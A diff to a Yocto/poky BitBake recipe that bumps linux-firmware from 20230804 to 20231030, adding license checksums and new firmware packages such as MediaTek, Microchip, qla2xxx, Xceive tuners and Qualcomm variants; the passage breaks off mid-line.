a/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20230804.bb b/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20231030.bb index 1dbe8374bc..c0394b9b3b 100644 --- a/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20230804.bb +++ b/poky/meta/recipes-kernel/linux-firmware/linux-firmware_20231030.bb @@ -12,6 +12,7 @@ LICENSE = "\ & Firmware-amdgpu \ & Firmware-amd-ucode \ & Firmware-amlogic_vdec \ + & Firmware-amphion_vpu \ & Firmware-atheros_firmware \ & Firmware-atmel \ & Firmware-broadcom_bcm43xx \ @@ -32,6 +33,7 @@ LICENSE = "\ & Firmware-i915 \ & Firmware-ibt_firmware \ & Firmware-ice \ + & Firmware-ice_enhanced \ & Firmware-it913x \ & Firmware-iwlwifi_firmware \ & Firmware-IntcSST2 \ @@ -39,11 +41,14 @@ LICENSE = "\ & Firmware-linaro \ & Firmware-Lontium \ & Firmware-Marvell \ + & Firmware-mediatek \ + & Firmware-microchip \ & Firmware-moxa \ & Firmware-myri10ge_firmware \ & Firmware-netronome \ & Firmware-nvidia \ & Firmware-nxp \ + & Firmware-nxp_mc_firmware \ & Firmware-OLPC \ & Firmware-ath9k-htc \ & Firmware-phanfw \ @@ -78,6 +83,7 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \ file://LICENSE.amdgpu;md5=a2589a05ea5b6bd2b7f4f623c7e7a649 \ file://LICENSE.amd-ucode;md5=6ca90c57f7b248de1e25c7f68ffc4698 \ file://LICENSE.amlogic_vdec;md5=dc44f59bf64a81643e500ad3f39a468a \ + file://LICENSE.amphion_vpu;md5=2bcdc00527b2d0542bd92b52aaec2b60 \ file://LICENCE.atheros_firmware;md5=30a14c7823beedac9fa39c64fdd01a13 \ file://LICENSE.atmel;md5=aa74ac0c60595dee4d4e239107ea77a3 \ file://LICENCE.broadcom_bcm43xx;md5=3160c14df7228891b868060e1951dfbc \ @@ -99,6 +105,7 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \ file://LICENSE.i915;md5=2b0b2e0d20984affd4490ba2cba02570 \ file://LICENCE.ibt_firmware;md5=fdbee1ddfe0fb7ab0b2fcd6b454a366b \ file://LICENSE.ice;md5=742ab4850f2670792940e6d15c974b2f \ + file://LICENSE.ice_enhanced;md5=f305cfc31b64f95f774f9edd9df0224d \ file://LICENCE.IntcSST2;md5=9e7d8bea77612d7cc7d9e9b54b623062 \ file://LICENCE.it913x;md5=1fbf727bfb6a949810c4dbfa7e6ce4f8 \ file://LICENCE.iwlwifi_firmware;md5=2ce6786e0fc11ac6e36b54bb9b799f1b \ @@ -107,12 +114,14 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \ file://LICENSE.Lontium;md5=4ec8dc582ff7295f39e2ca6a7b0be2b6 \ file://LICENCE.Marvell;md5=28b6ed8bd04ba105af6e4dcd6e997772 \ file://LICENCE.mediatek;md5=7c1976b63217d76ce47d0a11d8a79cf2 \ + file://LICENCE.microchip;md5=db753b00305675dfbf120e3f24a47277 \ file://LICENCE.moxa;md5=1086614767d8ccf744a923289d3d4261 \ file://LICENCE.myri10ge_firmware;md5=42e32fb89f6b959ca222e25ac8df8fed \ file://LICENCE.Netronome;md5=4add08f2577086d44447996503cddf5f \ file://LICENCE.nvidia;md5=4428a922ed3ba2ceec95f076a488ce07 \ file://LICENCE.NXP;md5=58bb8ba632cd729b9ba6183bc6aed36f \ file://LICENSE.nxp;md5=cca321ca1524d6a1e4fed87486cd82dc \ + file://LICENSE.nxp_mc_firmware;md5=9dc97e4b279b3858cae8879ae2fe5dd7 \ file://LICENCE.OLPC;md5=5b917f9d8c061991be4f6f5f108719cd \ file://LICENCE.open-ath9k-htc-firmware;md5=1b33c9f4d17bc4d457bdb23727046837 \ file://LICENCE.phanfw;md5=954dcec0e051f9409812b561ea743bfa \ @@ -142,7 +151,7 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \ " # WHENCE checksum is defined separately to ease overriding it if # class-devupstream is selected. -WHENCE_CHKSUM = "41f9a48bf27971b126a36f9344594dcd" +WHENCE_CHKSUM = "ceb5248746d24d165b603e71b288cf75" # These are not common licenses, set NO_GENERIC_LICENSE for them # so that the license files will be copied from fetched source @@ -152,6 +161,7 @@ NO_GENERIC_LICENSE[Firmware-agere] = "LICENCE.agere" NO_GENERIC_LICENSE[Firmware-amdgpu] = "LICENSE.amdgpu" NO_GENERIC_LICENSE[Firmware-amd-ucode] = "LICENSE.amd-ucode" NO_GENERIC_LICENSE[Firmware-amlogic_vdec] = "LICENSE.amlogic_vdec" +NO_GENERIC_LICENSE[Firmware-amphion_vpu] = "LICENSE.amphion_vpu" NO_GENERIC_LICENSE[Firmware-atheros_firmware] = "LICENCE.atheros_firmware" NO_GENERIC_LICENSE[Firmware-atmel] = "LICENSE.atmel" NO_GENERIC_LICENSE[Firmware-broadcom_bcm43xx] = "LICENCE.broadcom_bcm43xx" @@ -173,6 +183,7 @@ NO_GENERIC_LICENSE[Firmware-hfi1_firmware] = "LICENSE.hfi1_firmware" NO_GENERIC_LICENSE[Firmware-i915] = "LICENSE.i915" NO_GENERIC_LICENSE[Firmware-ibt_firmware] = "LICENCE.ibt_firmware" NO_GENERIC_LICENSE[Firmware-ice] = "LICENSE.ice" +NO_GENERIC_LICENSE[Firmware-ice_enhanced] = "LICENSE.ice_enhanced" NO_GENERIC_LICENSE[Firmware-IntcSST2] = "LICENCE.IntcSST2" NO_GENERIC_LICENSE[Firmware-it913x] = "LICENCE.it913x" NO_GENERIC_LICENSE[Firmware-iwlwifi_firmware] = "LICENCE.iwlwifi_firmware" @@ -181,11 +192,13 @@ NO_GENERIC_LICENSE[Firmware-linaro] = "LICENCE.linaro" NO_GENERIC_LICENSE[Firmware-Lontium] = "LICENSE.Lontium" NO_GENERIC_LICENSE[Firmware-Marvell] = "LICENCE.Marvell" NO_GENERIC_LICENSE[Firmware-mediatek] = "LICENCE.mediatek" +NO_GENERIC_LICENSE[Firmware-microchip] = "LICENCE.microchip" NO_GENERIC_LICENSE[Firmware-moxa] = "LICENCE.moxa" NO_GENERIC_LICENSE[Firmware-myri10ge_firmware] = "LICENCE.myri10ge_firmware" NO_GENERIC_LICENSE[Firmware-netronome] = "LICENCE.Netronome" NO_GENERIC_LICENSE[Firmware-nvidia] = "LICENCE.nvidia" NO_GENERIC_LICENSE[Firmware-nxp] = "LICENSE.nxp" +NO_GENERIC_LICENSE[Firmware-nxp_mc_firmware] = "LICENSE.nxp_mc_firmware" NO_GENERIC_LICENSE[Firmware-OLPC] = "LICENCE.OLPC" NO_GENERIC_LICENSE[Firmware-ath9k-htc] = "LICENCE.open-ath9k-htc-firmware" NO_GENERIC_LICENSE[Firmware-phanfw] = "LICENCE.phanfw" @@ -224,7 +237,7 @@ SRC_URI:class-devupstream = "git://git.kernel.org/pub/scm/linux/kernel/git/firmw # Pin this to the 20220509 release, override this in local.conf SRCREV:class-devupstream ?= "b19cbdca78ab2adfd210c91be15a22568e8b8cae" -SRC_URI[sha256sum] = "88d46c543847ee3b03404d4941d91c92974690ee1f6fdcbee9cef3e5f97db688" +SRC_URI[sha256sum] = "c98d200fc4a3120de1a594713ce34e135819dff23e883a4ed387863ba25679c7" inherit allarch @@ -240,14 +253,22 @@ do_install() { } -PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \ +PACKAGES =+ "${PN}-amphion-vpu-license ${PN}-amphion-vpu \ + ${PN}-cw1200-license ${PN}-cw1200 \ + ${PN}-ralink-license ${PN}-ralink \ ${PN}-mt7601u-license ${PN}-mt7601u \ + ${PN}-mt7650-license ${PN}-mt7650 \ + ${PN}-mt76x2-license ${PN}-mt76x2 \ ${PN}-radeon-license ${PN}-radeon \ ${PN}-amdgpu-license ${PN}-amdgpu \ ${PN}-marvell-license ${PN}-pcie8897 ${PN}-pcie8997 \ + ${PN}-mediatek-license ${PN}-mediatek \ + ${PN}-microchip-license ${PN}-microchip \ + ${PN}-moxa-license ${PN}-moxa \ ${PN}-sd8686 ${PN}-sd8688 ${PN}-sd8787 ${PN}-sd8797 ${PN}-sd8801 \ ${PN}-sd8887 ${PN}-sd8897 ${PN}-sd8997 ${PN}-usb8997 \ ${PN}-ti-connectivity-license ${PN}-wlcommon ${PN}-wl12xx ${PN}-wl18xx \ + ${PN}-ti-keystone-license ${PN}-ti-keystone \ ${PN}-vt6656-license ${PN}-vt6656 \ ${PN}-rs9113 ${PN}-rs9116 \ ${PN}-rtl-license ${PN}-rtl8188 ${PN}-rtl8192cu ${PN}-rtl8192ce ${PN}-rtl8192su ${PN}-rtl8723 ${PN}-rtl8821 \ @@ -291,7 +312,7 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \ ${PN}-bcm43xx-hdr \ ${PN}-cirrus-license ${PN}-cirrus \ ${PN}-cnm-license ${PN}-cnm \ - ${PN}-atheros-license ${PN}-ar9170 ${PN}-ath6k ${PN}-ath9k ${PN}-ath3k \ + ${PN}-atheros-license ${PN}-ar5523 ${PN}-ar9170 ${PN}-ath6k ${PN}-ath9k ${PN}-ath3k \ ${PN}-gplv2-license ${PN}-carl9170 \ ${PN}-ar3k-license ${PN}-ar3k ${PN}-ath10k-license ${PN}-ath10k ${PN}-ath11k ${PN}-qca \ \ @@ -317,6 +338,7 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \ ${PN}-ibt-misc \ ${PN}-i915-license ${PN}-i915 \ ${PN}-ice-license ${PN}-ice \ + ${PN}-ice-enhanced-license ${PN}-ice-enhanced \ ${PN}-adsp-sst-license ${PN}-adsp-sst \ ${PN}-bnx2-mips \ ${PN}-liquidio \ @@ -333,15 +355,21 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \ ${PN}-nxp9098-sdio \ ${PN}-nxpiw416-sdio \ ${PN}-nxpiw612-sdio \ + ${PN}-nxp-mc-license ${PN}-nxp-mc \ ${PN}-netronome-license ${PN}-netronome \ + ${PN}-olpc-license ${PN}-olpc \ + ${PN}-phanfw-license ${PN}-phanfw \ ${PN}-qat ${PN}-qat-license \ ${PN}-qcom-license ${PN}-qcom-yamato-license \ - ${PN}-qcom-venus-1.8 ${PN}-qcom-venus-4.2 ${PN}-qcom-venus-5.2 ${PN}-qcom-venus-5.4 \ + ${PN}-qcom-venus-1.8 ${PN}-qcom-venus-4.2 ${PN}-qcom-venus-5.2 ${PN}-qcom-venus-5.4 ${PN}-qcom-venus-6.0 \ ${PN}-qcom-vpu-1.0 ${PN}-qcom-vpu-2.0 \ ${PN}-qcom-adreno-a2xx ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a4xx ${PN}-qcom-adreno-a530 \ - ${PN}-qcom-adreno-a630 ${PN}-qcom-adreno-a650 ${PN}-qcom-adreno-a660 \ + ${PN}-qcom-adreno-a630 ${PN}-qcom-adreno-a650 ${PN}-qcom-adreno-a660 ${PN}-qcom-adreno-a702 \ ${PN}-qcom-apq8016-modem ${PN}-qcom-apq8016-wifi \ ${PN}-qcom-apq8096-adreno ${PN}-qcom-apq8096-audio ${PN}-qcom-apq8096-modem \ + ${PN}-qcom-qcm2290-adreno ${PN}-qcom-qcm2290-audio ${PN}-qcom-qcm2290-modem ${PN}-qcom-qcm2290-wifi \ + ${PN}-qcom-qrb4210-adreno ${PN}-qcom-qrb4210-audio ${PN}-qcom-qrb4210-compute \ + ${PN}-qcom-qrb4210-modem ${PN}-qcom-qrb4210-wifi \ ${PN}-qcom-sc8280xp-lenovo-x13s-compat \ ${PN}-qcom-sc8280xp-lenovo-x13s-audio \ ${PN}-qcom-sc8280xp-lenovo-x13s-adreno \ @@ -350,13 +378,39 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \ ${PN}-qcom-sdm845-adreno ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \ ${PN}-qcom-sdm845-thundercomm-db845c-sensors \ ${PN}-qcom-sm8250-adreno ${PN}-qcom-sm8250-audio ${PN}-qcom-sm8250-compute \ + ${PN}-qcom-sm8250-thundercomm-rb5-sensors \ + ${PN}-qla2xxx ${PN}-qla2xxx-license \ ${PN}-amlogic-vdec-license ${PN}-amlogic-vdec \ ${PN}-lt9611uxc ${PN}-lontium-license \ ${PN}-whence-license \ + ${PN}-wl1251-license ${PN}-wl1251 \ + ${PN}-xc4000-license ${PN}-xc4000 \ + ${PN}-xc5000-license ${PN}-xc5000 \ + ${PN}-xc5000c-license ${PN}-xc5000c \ ${PN}-license \ " +# For Amphion VPU +LICENSE:${PN}-amphion-vpu = "Firmware-amphion_vpu" +LICENSE:${PN}-amphion-vpu-license = "Firmware-amphion_vpu" + +FILES:${PN}-amphion-vpu = "${nonarch_base_libdir}/firmware/amphion/*" +FILES:${PN}-amphion-vpu-license = " \ + ${nonarch_base_libdir}/firmware/LICENSE.amphion_vpu \ +" +RDEPENDS:${PN}-amphion-vpu += "${PN}-amphion-vpu-license" + +# For cw1200 +LICENSE:${PN}-cw1200 = "Firmware-cw1200" +LICENSE:${PN}-cw1200-license = "Firmware-cw1200" + +FILES:${PN}-cw1200 = "${nonarch_base_libdir}/firmware/wsm_22.bin" +FILES:${PN}-cw1200-license = "${nonarch_base_libdir}/firmware/LICENCE.cw1200" + +RDEPENDS:${PN}-cw1200 += "${PN}-cw1200-license" + # For atheros +LICENSE:${PN}-ar5523 = "Firmware-atheros_firmware" LICENSE:${PN}-ar9170 = "Firmware-atheros_firmware" LICENSE:${PN}-ath3k = "Firmware-atheros_firmware" LICENSE:${PN}-ath6k = "Firmware-atheros_firmware" @@ -364,6 +418,9 @@ LICENSE:${PN}-ath9k = "Firmware-atheros_firmware" LICENSE:${PN}-atheros-license = "Firmware-atheros_firmware" FILES:${PN}-atheros-license = "${nonarch_base_libdir}/firmware/LICENCE.atheros_firmware" +FILES:${PN}-ar5523 = " \ + ${nonarch_base_libdir}/firmware/ar5523.bin \ +" FILES:${PN}-ar9170 = " \ ${nonarch_base_libdir}/firmware/ar9170*.fw \ " @@ -382,6 +439,7 @@ FILES:${PN}-ath9k = " \ ${nonarch_base_libdir}/firmware/ath9k_htc/htc_9271-1.4.0.fw \ " +RDEPENDS:${PN}-ar5523 += "${PN}-atheros-license" RDEPENDS:${PN}-ar9170 += "${PN}-atheros-license" RDEPENDS:${PN}-ath6k += "${PN}-atheros-license" RDEPENDS:${PN}-ath9k += "${PN}-atheros-license" @@ -445,11 +503,73 @@ LICENSE:${PN}-mt7601u-license = "Firmware-ralink_a_mediatek_company_firmware" FILES:${PN}-mt7601u-license = "${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware" FILES:${PN}-mt7601u = " \ ${nonarch_base_libdir}/firmware/mediatek/mt7601u.bin \ + ${nonarch_base_libdir}/firmware/mt7601u.bin \ " - RDEPENDS:${PN}-mt7601u += "${PN}-mt7601u-license" +# For MediaTek Bluetooth USB driver 7650 +LICENSE:${PN}-mt7650 = "Firmware-ralink_a_mediatek_company_firmware" +LICENSE:${PN}-mt7650-license = "Firmware-ralink_a_mediatek_company_firmware" + +FILES:${PN}-mt7650-license = " \ + ${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware \ +" +FILES:${PN}-mt7650 = " \ + ${nonarch_base_libdir}/firmware/mediatek/mt7650.bin \ + ${nonarch_base_libdir}/firmware/mt7650.bin \ +" +RDEPENDS:${PN}-mt7650 += "${PN}-mt7650-license" + +# For MediaTek MT76x2 Wireless MACs +LICENSE:${PN}-mt76x2 = "Firmware-ralink_a_mediatek_company_firmware" +LICENSE:${PN}-mt76x2-license = "Firmware-ralink_a_mediatek_company_firmware" + +FILES:${PN}-mt76x2-license = " \ + ${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware \ +" +FILES:${PN}-mt76x2 = " \ + ${nonarch_base_libdir}/firmware/mediatek/mt7662.bin \ + ${nonarch_base_libdir}/firmware/mt7662.bin \ + ${nonarch_base_libdir}/firmware/mediatek/mt7662_rom_patch.bin \ + ${nonarch_base_libdir}/firmware/mt7662_rom_patch.bin \ +" +RDEPENDS:${PN}-mt76x2 += "${PN}-mt76x2-license" + +# For MediaTek +LICENSE:${PN}-mediatek = "Firmware-mediatek" +LICENSE:${PN}-mediatek-license = "Firmware-mediatek" + +FILES:${PN}-mediatek = " \ + ${nonarch_base_libdir}/firmware/mediatek/* \ + ${nonarch_base_libdir}/firmware/vpu_d.bin \ + ${nonarch_base_libdir}/firmware/vpu_p.bin \ +" +FILES:${PN}-mediatek-license = " \ + ${nonarch_base_libdir}/firmware/LICENCE.mediatek \ +" +RDEPENDS:${PN}-mediatek += "${PN}-mediatek-license" + +# For Microchip +LICENSE:${PN}-microchip = "Firmware-microchip" +LICENSE:${PN}-microchip-license = "Firmware-microchip" + +FILES:${PN}-microchip = "${nonarch_base_libdir}/firmware/microchip/*" +FILES:${PN}-microchip-license = " \ + ${nonarch_base_libdir}/firmware/LICENCE.microchip \ +" +RDEPENDS:${PN}-microchip += "${PN}-microchip-license" + +# For MOXA +LICENSE:${PN}-moxa = "Firmware-moxa" +LICENSE:${PN}-moxa-license = "Firmware-moxa" + +FILES:${PN}-moxa = "${nonarch_base_libdir}/firmware/moxa" +FILES:${PN}-moxa-license = "${nonarch_base_libdir}/firmware/LICENCE.moxa" + +RDEPENDS:${PN}-moxa += "${PN}-moxa-license" + # For radeon + LICENSE:${PN}-radeon = "Firmware-radeon" LICENSE:${PN}-radeon-license = "Firmware-radeon" @@ -604,6 +724,16 @@ RDEPENDS:${PN}-nxp9098-sdio += "${PN}-nxp9098-common" RDEPENDS:${PN}-nxpiw416-sdio += "${PN}-nxp-license" RDEPENDS:${PN}-nxpiw612-sdio += "${PN}-nxp-license" +# For nxp-mc +LICENSE:${PN}-nxp-mc = "Firmware-nxp_mc_firmware" +LICENSE:${PN}-nxp-mc-license = "Firmware-nxp_mc_firmware" + +FILES:${PN}-nxp-mc= "${nonarch_base_libdir}/firmware/dpaa2/mc/*" +FILES:${PN}-nxp-mc-license = " \ + ${nonarch_base_libdir}/firmware/LICENSE.nxp_mc_firmware \ +" +RDEPENDS:${PN}-nxp-mc += "${PN}-nxp-mc-license" + # For Nvidia LICENSE:${PN}-nvidia-gpu = "Firmware-nvidia" LICENSE:${PN}-nvidia-tegra = "Firmware-nvidia" @@ -626,6 +756,37 @@ RDEPENDS:${PN}-nvidia-gpu += "${PN}-nvidia-license" RDEPENDS:${PN}-nvidia-tegra += "${PN}-nvidia-license" RDEPENDS:${PN}-nvidia-tegra-k1 += "${PN}-nvidia-license" +# For OLPC +LICENSE:${PN}-olpc = "Firmware-OLPC" +LICENSE:${PN}-olpc-license = "Firmware-OLPC" + +FILES:${PN}-olpc = " \ + ${nonarch_base_libdir}/firmware/libertas/lbtf_sdio.bin \ + ${nonarch_base_libdir}/firmware/lbtf_usb.bin \ + ${nonarch_base_libdir}/firmware/libertas/usb8388_olpc.bin \ +" +FILES:${PN}-olpc-license = "${nonarch_base_libdir}/firmware/LICENCE.OLPC" + +RDEPENDS:${PN}-olpc += "${PN}-olpc-license" + +# For phanfw +LICENSE:${PN}-phanfw = "Firmware-phanfw" +LICENSE:${PN}-phanfw-license = "Firmware-phanfw" + +FILES:${PN}-phanfw = "${nonarch_base_libdir}/firmware/phanfw.bin" +FILES:${PN}-phanfw-license = "${nonarch_base_libdir}/firmware/LICENCE.phanfw" + +RDEPENDS:${PN}-phanfw += "${PN}-phanfw-license" + +# For qla2xxx +LICENSE:${PN}-qla2xxx = "Firmware-qla2xxx" +LICENSE:${PN}-qla2xxx-license = "Firmware-qla2xxx" + +FILES:${PN}-qla2xxx = "${nonarch_base_libdir}/firmware/ql2*" +FILES:${PN}-qla2xxx-license = "${nonarch_base_libdir}/firmware/LICENCE.qla2xxx" + +RDEPENDS:${PN}-qla2xxx += "${PN}-qla2xxx-license" + # For RSI RS911x WiFi LICENSE:${PN}-rs9113 = "WHENCE" LICENSE:${PN}-rs9116 = "WHENCE" @@ -668,6 +829,7 @@ FILES:${PN}-rtl8723 = " \ " FILES:${PN}-rtl8821 = " \ ${nonarch_base_libdir}/firmware/rtlwifi/rtl8821*.bin \ + ${nonarch_base_libdir}/firmware/rtw88/rtw8821*.bin \ " FILES:${PN}-rtl8761 = " \ ${nonarch_base_libdir}/firmware/rtl_bt/rtl8761*.bin \ @@ -691,6 +853,18 @@ RDEPENDS:${PN}-rtl8761 += "${PN}-rtl-license" RDEPENDS:${PN}-rtl8822 += "${PN}-rtl-license" RDEPENDS:${PN}-rtl8168 += "${PN}-whence-license" +# For TI wl1251 +LICENSE:${PN}-wl1251 = "Firmware-wl1251" +LICENSE:${PN}-wl1251-license = "Firmware-wl1251" + +FILES:${PN}-wl1251 = " \ + ${nonarch_base_libdir}/firmware/ti-connectivity/wl1251-fw.bin \ + ${nonarch_base_libdir}/firmware/ti-connectivity/wl1251-nvs.bin \ +" +FILES:${PN}-wl1251-license = "${nonarch_base_libdir}/firmware/LICENCE.wl1251" + +RDEPENDS:${PN}-wl1251 += "${PN}-wl1251-license" + # For ti-connectivity LICENSE:${PN}-wlcommon = "Firmware-ti-connectivity" LICENSE:${PN}-wl12xx = "Firmware-ti-connectivity" @@ -720,6 +894,16 @@ FILES:${PN}-wl18xx = " \ RDEPENDS:${PN}-wl12xx = "${PN}-ti-connectivity-license ${PN}-wlcommon" RDEPENDS:${PN}-wl18xx = "${PN}-ti-connectivity-license ${PN}-wlcommon" +# For ti-keystone +LICENSE:${PN}-ti-keystone = "Firmware-ti-keystone" +LICENSE:${PN}-ti-keystone-license = "Firmware-ti-keystone" + +FILES:${PN}-ti-keystone = "${nonarch_base_libdir}/firmware/ti-keystone/*" +FILES:${PN}-ti-keystone-license = " \ + ${nonarch_base_libdir}/firmware/LICENCE.ti-keystone \ +" +RDEPENDS:${PN}-ti-keystone += "${PN}-ti-keystone-license" + # For vt6656 LICENSE:${PN}-vt6656 = "Firmware-via_vt6656" LICENSE:${PN}-vt6656-license = "Firmware-via_vt6656" @@ -731,6 +915,35 @@ FILES:${PN}-vt6656 = " \ RDEPENDS:${PN}-vt6656 = "${PN}-vt6656-license" +# For xc4000 +LICENSE:${PN}-xc4000 = "Firmware-xc4000" +LICENSE:${PN}-xc4000-license = "Firmware-xc4000" + +FILES:${PN}-xc4000 = "${nonarch_base_libdir}/firmware/dvb-fe-xc4000-1.4.1.fw" +FILES:${PN}-xc4000-license = "${nonarch_base_libdir}/firmware/LICENCE.xc4000" + +RDEPENDS:${PN}-xc4000 += "${PN}-xc4000-license" + +# For xc5000 +LICENSE:${PN}-xc5000 = "Firmware-xc5000" +LICENSE:${PN}-xc5000-license = "Firmware-xc5000" + +FILES:${PN}-xc5000 = "${nonarch_base_libdir}/firmware/dvb-fe-xc5000-1.6.114.fw" +FILES:${PN}-xc5000-license = "${nonarch_base_libdir}/firmware/LICENCE.xc5000" + +RDEPENDS:${PN}-xc5000 += "${PN}-xc5000-license" + +# For xc5000c +LICENSE:${PN}-xc5000c = "Firmware-xc5000c" +LICENSE:${PN}-xc5000c-license = "Firmware-xc5000c" + +FILES:${PN}-xc5000c = " \ + ${nonarch_base_libdir}/firmware/dvb-fe-xc5000c-4.1.30.7.fw \ +" +FILES:${PN}-xc5000c-license = "${nonarch_base_libdir}/firmware/LICENCE.xc5000c" + +RDEPENDS:${PN}-xc5000c += "${PN}-xc5000c-license" + # For broadcom # for i in `grep brcm WHENCE | grep ^File | sed 's/File: brcm.//g'`; do pkg=`echo $i | sed 's/-[sp40].*//g; s/\.bin//g; s/brcmfmac/bcm/g; s/_hdr/-hdr/g; s/BCM/bcm-0bb4-0306/g'`; echo -e " \${PN}-$pkg \\"; done | sort -u @@ -1053,10 +1266,26 @@ FILES:${PN}-i915-license = "${nonarch_base_libdir}/firmware/LICENSE.i915" FILES:${PN}-i915 = "${nonarch_base_libdir}/firmware/i915" RDEPENDS:${PN}-i915 = "${PN}-i915-license" +# For ice-enhanced +LICENSE:${PN}-ice-enhanced = "Firmware-ice_enhanced" +LICENSE:${PN}-ice-enhanced-license = "Firmware-ice_enhanced" + +FILES:${PN}-ice-enhanced = " \ + ${nonarch_base_libdir}/firmware/intel/ice/ddp-comms/* \ + ${nonarch_base_libdir}/firmware/intel/ice/ddp-wireless_edge/* \ +" +FILES:${PN}-ice-enhanced-license = " \ + ${nonarch_base_libdir}/firmware/LICENSE.ice_enhanced \ +" +RDEPENDS:${PN}-ice-enhanced = "${PN}-ice-enhanced-license" + LICENSE:${PN}-ice = "Firmware-ice" LICENSE:${PN}-ice-license = "Firmware-ice" FILES:${PN}-ice-license = "${nonarch_base_libdir}/firmware/LICENSE.ice" -FILES:${PN}-ice = "${nonarch_base_libdir}/firmware/intel/ice" +FILES:${PN}-ice = " \ + ${nonarch_base_libdir}/firmware/intel/ice/ddp/* \ + ${nonarch_base_libdir}/firmware/intel/ice/ddp-lag/* \ +" RDEPENDS:${PN}-ice = "${PN}-ice-license" FILES:${PN}-adsp-sst-license = "${nonarch_base_libdir}/firmware/LICENCE.adsp_sst" @@ -1079,6 +1308,7 @@ LICENSE:${PN}-qcom-venus-1.8 = "Firmware-qcom" LICENSE:${PN}-qcom-venus-4.2 = "Firmware-qcom" LICENSE:${PN}-qcom-venus-5.2 = "Firmware-qcom" LICENSE:${PN}-qcom-venus-5.4 = "Firmware-qcom" +LICENSE:${PN}-qcom-venus-6.0 = "Firmware-qcom" LICENSE:${PN}-qcom-vpu-1.0 = "Firmware-qcom" LICENSE:${PN}-qcom-vpu-2.0 = "Firmware-qcom" LICENSE:${PN}-qcom-adreno-a2xx = "Firmware-qcom Firmware-qcom-yamato" @@ -1088,11 +1318,21 @@ LICENSE:${PN}-qcom-adreno-a530 = "Firmware-qcom" LICENSE:${PN}-qcom-adreno-a630 = "Firmware-qcom" LICENSE:${PN}-qcom-adreno-a650 = "Firmware-qcom" LICENSE:${PN}-qcom-adreno-a660 = "Firmware-qcom" +LICENSE:${PN}-qcom-adreno-a702 = "Firmware-qcom" LICENSE:${PN}-qcom-apq8016-modem = "Firmware-qcom" LICENSE:${PN}-qcom-apq8016-wifi = "Firmware-qcom" LICENSE:${PN}-qcom-apq8096-audio = "Firmware-qcom" LICENSE:${PN}-qcom-apq8096-adreno = "Firmware-qcom" LICENSE:${PN}-qcom-apq8096-modem = "Firmware-qcom" +LICENSE:${PN}-qcom-qcm2290-adreno = "Firmware-qcom" +LICENSE:${PN}-qcom-qcm2290-audio = "Firmware-qcom" +LICENSE:${PN}-qcom-qcm2290-modem = "Firmware-qcom" +LICENSE:${PN}-qcom-qcm2290-wifi = "Firmware-qcom" +LICENSE:${PN}-qcom-qrb4210-adreno = "Firmware-qcom" +LICENSE:${PN}-qcom-qrb4210-audio = "Firmware-qcom" +LICENSE:${PN}-qcom-qrb4210-compute = "Firmware-qcom" +LICENSE:${PN}-qcom-qrb4210-modem = "Firmware-qcom" +LICENSE:${PN}-qcom-qrb4210-wifi = "Firmware-qcom" LICENSE:${PN}-qcom-sc8280xp-lenovo-x13s-audio = "Firmware-qcom & Firmware-linaro" LICENSE:${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "Firmware-qcom" LICENSE:${PN}-qcom-sc8280xp-lenovo-x13s-compute = "Firmware-qcom" @@ -1105,6 +1345,7 @@ LICENSE:${PN}-qcom-sdm845-thundercomm-db845c-sensors = "Firmware-qcom" LICENSE:${PN}-qcom-sm8250-audio = "Firmware-qcom" LICENSE:${PN}-qcom-sm8250-adreno = "Firmware-qcom" LICENSE:${PN}-qcom-sm8250-compute = "Firmware-qcom" +LICENSE:${PN}-qcom-sm8250-thundercomm-rb5-sensors = "Firmware-qcom" FILES:${PN}-qcom-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom ${nonarch_base_libdir}/firmware/qcom/NOTICE.txt" FILES:${PN}-qcom-yamato-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom_yamato" @@ -1112,6 +1353,7 @@ FILES:${PN}-qcom-venus-1.8 = "${nonarch_base_libdir}/firmware/qcom/venus-1.8/*" FILES:${PN}-qcom-venus-4.2 = "${nonarch_base_libdir}/firmware/qcom/venus-4.2/*" FILES:${PN}-qcom-venus-5.2 = "${nonarch_base_libdir}/firmware/qcom/venus-5.2/*" FILES:${PN}-qcom-venus-5.4 = "${nonarch_base_libdir}/firmware/qcom/venus-5.4/*" +FILES:${PN}-qcom-venus-6.0 = "${nonarch_base_libdir}/firmware/qcom/venus-6.0/*" FILES:${PN}-qcom-vpu-1.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-1.0/*" FILES:${PN}-qcom-vpu-2.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-2.0/*" FILES:${PN}-qcom-adreno-a2xx = "${nonarch_base_libdir}/firmware/qcom/leia_*.fw ${nonarch_base_libdir}/firmware/qcom/yamato_*.fw" @@ -1121,29 +1363,41 @@ FILES:${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.fw*" FILES:${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.*" FILES:${PN}-qcom-adreno-a650 = "${nonarch_base_libdir}/firmware/qcom/a650*.*" FILES:${PN}-qcom-adreno-a660 = "${nonarch_base_libdir}/firmware/qcom/a660*.*" +FILES:${PN}-qcom-adreno-a702 = "${nonarch_base_libdir}/firmware/qcom/a702*.*" FILES:${PN}-qcom-apq8016-modem = "${nonarch_base_libdir}/firmware/qcom/apq8016/mba.mbn 